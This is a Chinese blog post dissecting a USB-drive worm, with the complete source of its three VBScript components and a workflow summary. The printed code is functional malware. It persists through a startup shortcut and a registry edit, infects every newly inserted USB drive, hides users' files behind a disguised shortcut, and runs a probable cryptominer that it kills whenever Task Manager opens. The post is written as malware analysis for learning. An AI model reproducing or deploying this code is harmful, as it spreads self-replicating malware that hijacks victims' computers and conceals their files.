一个常见U盘病毒的源码解读
2018-03-02 21:44
423 查看
目录
目录现象
源代码解读
1 快捷方式文件
2 movemenoreg vbs文件
3 helper vbs文件
4 installer vbs文件
工作流程
1 从U盘感染电脑
2 从电脑感染U盘
总结
1. 现象
该病毒会在感染的U盘的根目录下建立两个隐藏目录和一个快捷方式文件,其中两个隐藏目录的名称分别为“-”和“WindowsServices”。在名为“-”的目录下存放着用户原来U盘里面的所有文件,在名为“WindowsServices”的目录下存放着三个病毒文件,文件名为:movemenoreg.vbs,
installer.vbs,
helper.vbs。(从源代码里发现,其实是有四个文件,还有一个文件名为
WindowsServices.exe,只是我的U盘里面没有这个文件)。快捷方式文件名与用户的U盘名称相同。
2. 源代码解读
2.1 快捷方式文件
快捷方式文件是只一个入口,用来误导用户点击,以启动病毒的主体文件。快捷方式的目标如下:%COMSPEC% /C .\WindowsServices\movemenoreg.vbs
其中,
%COMSPEC%是环境变量,指的是
C:\Windows\system32\cmd.exe。这里是用
cmd.exe打开病毒文件
movemenoreg.vbs。
2.2 movemenoreg .vbs文件
'发生错误时,程序继续执行下一句代码 on error resume next '定义一系统变量 Dim strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess '获得WScript.Shell Set ws = WScript.CreateObject("WScript.Shell") Target = "\WindowsServices" '打开根目录下名为‘-’的目录,也就是真正存放用户所有文件的目录 strPath = WScript.ScriptFullName set objws = CreateObject("Scripting.FileSystemObject") Set objFile = objws.GetFile(strPath) strFolder = objws.GetParentFolderName(objFile) pfolder = objws.GetParentFolderName(strFolder) 'Chr(34)是双引号 ws.Run Chr(34) & pfolder & "\_" & Chr(34) AppData = ws.ExpandEnvironmentStrings("%AppData%") DestFolder = AppData & Target '创建目标目录,也就是%AppData%\WindowsServices目录 if (not objws.folderexists(DestFolder)) then objws.CreateFolder DestFolder Set objDestFolder = objws.GetFolder(DestFolder) end if '将四个病毒文件复制到目标目录并隐藏,再将目标目录隐藏 Call moveandhide ("\helper.vbs") Call moveandhide ("\installer.vbs") Call moveandhide ("\movemenoreg.vbs") Call moveandhide ("\WindowsServices.exe") objDestFolder.Attributes = objDestFolder.Attributes + 39 sub moveandhide (name) if (not objws.fileexists(DestFolder & name)) then '复制文件 objws.CopyFile strFolder & name, DestFolder & "\" Set objmove = objws.GetFile(DestFolder & name) '隐藏文件(39表示文件属性为归档、系统、隐藏) If not objmove.Attributes AND 39 then objmove.Attributes = 0 objmove.Attributes = objmove.Attributes + 39 end if end if end sub Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2") Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'") '从任务管理器中查找helper.vbs是否已经运行,如果已经运行则退出当前脚本 For Each objProcess In colProcess vaprocess = objProcess.CommandLine if instr(vaprocess, "helper.vbs") then WScript.quit End if Next '运行helper.vbs ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34) Set ws = Nothing
2.3 helper .vbs文件
on error resume next Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key Set ws = WScript.CreateObject("WScript.Shell") nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk" Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2") strPath = WScript.ScriptFullName set objws = CreateObject("Scripting.FileSystemObject") Set objFile = objws.GetFile(strPath) strFolder = objws.GetParentFolderName(objFile) strPath = strFolder & "\" '获得用户启动目录的路径 startupPath = ws.SpecialFolders("startup") miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34) MyScript = "helper.vbs" While True '检查注册表是否已经修改,如果没有,则修改注册表启动项 key = Empty key = ws.regread (nkey) If (not IsEmpty(key)) then ws.RegWrite nkey, 2, "REG_BINARY" End if If (not objws.fileexists(startupPath & "\helper.lnk")) then '在启动目录创建helper.vbs的启动快捷方式 Set link = ws.CreateShortcut(startupPath & "\helper.lnk") link.Description = "helper" link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34) link.WorkingDirectory = strPath link.Save End If Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'") '检查installer.vbs文件是否在执行,如果不在则运行installer.vbs call procheck(colProcess, "installer.vbs") Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'") Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'") if colProcess.count = 0 And tskProcess.count = 0 then '运行WindowsServices.exe ws.Run miner, 0 ElseIf colProcess.count > 0 And tskProcess.count > 0 then '如果用户打开了任务管理器,则杀掉WindowsServices.exe For Each objProcess In colProcess ws.run "taskkill /PID " & objProcess.ProcessId , 0 Next end if WScript.Sleep 3000 Wend '--------------------------------------------------------------------------------- sub procheck(checkme, procname) For Each objProcess In checkme vaprocess = objProcess.CommandLine if instr(vaprocess, procname) then Exit sub End if Next ws.Run Chr(34) & strPath & procname & Chr(34) end sub '--------------------------------------------------------------------------------
2.4 installer .vbs文件
整个installer.vbs文件主要起感染新U盘的作用。on error resume next DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, ob ecfc jWinMgmt strComputer = "." Set ws = WScript.CreateObject("WScript.Shell") Target = "\WindowsServices" 'where are we? strPath = WScript.ScriptFullName set objws = CreateObject("Scripting.FileSystemObject") Set objFile = objws.GetFile(strPath) strFolder = objws.GetParentFolderName(objFile) 'Checking for USB instance Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") '查询硬盘事件 Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'") Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2") While True '检查helper.vbs是否在执行,如果不在执行,则运行help.vbs Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'") call procheck(colProcess, "helper.vbs") '取出下一个事件 Set objEvent = colEvents.NextEvent If objEvent.TargetInstance.DriveType = 2 Then If objEvent.Path_.Class = "__InstanceCreationEvent" Then '一个新的U盘插入 device = objEvent.TargetInstance.DeviceID devicename = objEvent.TargetInstance.VolumeName DestFolder = device & "\WindowsServices" DummyFolder = device & "\" & "_" '在U盘根目录下创建目的目录(\WindowsServices) if (not objws.folderexists(DestFolder)) then objws.CreateFolder DestFolder Set objDestFolder = objws.GetFolder(DestFolder) objDestFolder.Attributes = objDestFolder.Attributes + 39 end if '将四个病毒文件移动到目的目录 Call moveandhide ("\helper.vbs") Call moveandhide ("\installer.vbs") Call moveandhide ("\movemenoreg.vbs") Call moveandhide ("\WindowsServices.exe") '在U盘根目录下创建打开movemenoreg.vbs文件的快捷方式 if (not objws.fileexists (device & devicename & ".lnk")) then Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk") link.IconLocation = "%windir%\system32\SHELL32.dll, 7" link.TargetPath = "%COMSPEC%" link.Arguments = "/C .\WindowsServices\movemenoreg.vbs" link.windowstyle = 7 link.Save End If '在U盘根目录下创建名为‘-’的目录并隐藏 if (not objws.folderexists(DummyFolder)) then objws.CreateFolder DummyFolder Set objDestFolder = objws.GetFolder(DummyFolder) objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4 End If set check = objws.getFolder(device) '将用户文件都移动到名为‘-’的目录下 Call checker(check) End If End If Wend sub checker (path) set home = path.Files For Each file in home Select Case file.Name Case devicename & ".lnk" 'nothings Case Else objws.MoveFile path & file.Name, DummyFolder & "\" End Select Next set home = path.SubFolders For Each home in home Select Case home Case path & "_" 'nothings Case path & "WindowsServices" 'nothings Case path & "System Volume Information" 'nothings' Case Else objws. MoveFolder home, DummyFolder & "\" End Select Next end sub '------------------------------------------------------------ sub moveandhide (name) if (not objws.fileexists(DestFolder & name)) then objws.CopyFile strFolder & name, DestFolder & "\" Set objmove = objws.GetFile(DestFolder & name) If not objmove.Attributes AND 39 then objmove.Attributes = 0 objmove.Attributes = objmove.Attributes + 39 end if end if end sub '------------------------------------------------------------ sub procheck(checkme, procname) For Each objProcess In checkme vaprocess = objProcess.CommandLine if instr(vaprocess, procname) then Exit sub End if Next ws.Run Chr(34) & strFolder & "\" & procname & Chr(34) end sub
3. 工作流程
3.1 从U盘感染电脑
一个感染后的U盘–》用户点击U盘根目录下的快捷方式–》病毒将自己复制到%AppData%\WindowsServices目录下,并将自己添加到开机启动项,时刻查询新U盘的插入,一旦有新U盘插入,马上病毒文件复制到新U盘
3.2 从电脑感染U盘
一台受感染的电脑–》U盘病毒随电脑开机启动–》病毒检查到新U盘插入–》病毒在新U盘的根目录下建立“-”和“WindowsServices”目录,将用户原有的所有文件复制到“-”目录下,将四个病毒代码文件复制到“WindowsServices”目录下,在U盘根目录下建立打开病毒文件movemenoreg.vbs的快捷方式
4. 总结
“麻雀虽小,五脏俱全”,该病毒虽然只有三百行不到的代码,但是感染宿主,寻找新宿主以及反查杀能力都具备了;代码中变量的命名、功能的划分都比较合理,可以看出制作病毒的这位前辈对于vbs的编程以及病毒的编写比较熟练;
由于缺失病毒文件
WindowsServices.exe,我们无法得知这位前辈真正的目的是什么,但是,从
helper.vbs的
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)这一句命令中,我们可以推测出它大概是一个挖矿程序。
郑重声明:本文对该病毒源代码进行分析,只为学习和传播知识使用,一切后果与本文作者无关!
相关文章推荐
- 一个程序破解多个验证码之源码解读[附源码]
- QVariant相当于一个包含大多数Qt数据类型的联合体(源码解读)
- Java6集合类源码解读-----ArrayList中一个有趣的变量oldData
- 如何判断一个Http Message的结束——python源码解读
- 一个JavaScript Title、alt提示(Tips)源码解读
- 如何判断一个Http Message的结束——python源码解读
- HashMap源码的解读-为何存取的性能很高的一个重要点
- Vue源码解读——实现一个双向绑定(Object.defineProperty与observe)
- 一个便签项目的源码解读
- java集合之ArrayList源码解读 帮助大家自己动手写一个ArrayList
- Java8 HashMap源码解读时的一个迷惑
- 一个U盘病毒汇编源码分析
- react-redux-router 一个完整项目解读(附源码)
- 解读QT信号与槽机制里 QMetaObject::connectSlotsByName(QObject *o)的源码 介绍 connectSlotsByName 是一个QMetaObject类里的
- Caffe源码解读(十一):自定义一个layer
- JVM源码分析之FinalReference完全解读
- spring 源码解读与设计详解: 7 BeanDefinitionParserDelegate深入解读
- Apache Beam WordCount编程实战及源码解读
- 源码级别解读 mybatis 插件
- 用C写的一个扫描器源码